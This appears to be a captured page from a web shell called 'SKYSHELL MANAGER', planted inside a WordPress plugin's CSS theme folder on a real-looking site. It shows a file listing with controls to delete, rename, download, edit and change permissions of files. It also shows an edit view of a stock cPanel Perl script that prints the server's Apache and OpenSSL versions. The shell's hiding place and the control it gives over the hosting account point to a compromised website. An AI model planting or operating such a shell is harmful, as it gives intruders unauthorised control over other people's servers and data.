📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
drhyperbaric.com
/
wp-content
/
plugins
/
loginpress
/
css
/
themes
/
Name
Size
Perm
Actions
📄
error_log
291.31 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: serverinfo
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - bin/serverinfo Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited use strict; use warnings; use Cpanel::ConfigFiles::Apache::modules (); use Cpanel::OpenSSL (); my $apache_version = Cpanel::ConfigFiles::Apache::modules::apache_long_version(); if ($apache_version) { print "apache_version:$apache_version\n"; } my $openssl = Cpanel::OpenSSL->new( 'extended' => 1 ); if ( defined $openssl ) { if ( $openssl->{'version'} ) { print "openssl_version:$openssl->{'version'}\n"; } }
Save